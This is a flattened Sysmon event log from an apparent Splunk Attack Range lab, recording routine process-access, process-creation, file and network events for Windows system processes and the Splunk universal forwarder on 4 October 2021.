07:49:34.755{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081198Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.755{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081197Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.755{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081196Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.755{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081195Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.755{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081194Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.755{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081193Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.755{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081192Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.755{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081191Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.755{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081190Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.755{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B20E-615A-3E01-00000000FD01}1536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081189Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.755{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B20E-615A-3E01-00000000FD01}1536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081188Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.756{2FDD8D40-B20E-615A-3E01-00000000FD01}1536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081187Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.192{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=502C60261F8DEC03A03A184966B2F301,SHA256=ADDA9C7E8EB96B11CC875872E067EF1868684EDD457142A0F753210D1DE95556,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081186Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:30.698{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50011-false10.0.1.12-8000- 23542300x800000000000000081185Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:34.005{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F95560CDEBA5932E75674F95B7DFE49B,SHA256=16AB0BBCE13215648EFC26F68D8E327813B8EAC3C442A29BDF8C672686E1A1BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103301Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:35.184{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4DDFBAEC3D50D8C00A888698F5AA0CD,SHA256=37F7D8C90632D5FFD2B7FF90955278C3FBF7BB1933B341F9A11CE4C0AD81B50A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081217Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.943{2FDD8D40-B20F-615A-3F01-00000000FD01}2924024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081216Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.786{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B20F-615A-3F01-00000000FD01}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081215Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.786{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081214Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.786{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081213Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.786{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081212Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.786{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081211Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.786{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081210Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.786{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081209Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.786{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081208Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.786{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081207Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.786{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081206Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.786{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B20F-615A-3F01-00000000FD01}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081205Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:35.786{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B20F-615A-3F01-00000000FD01}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 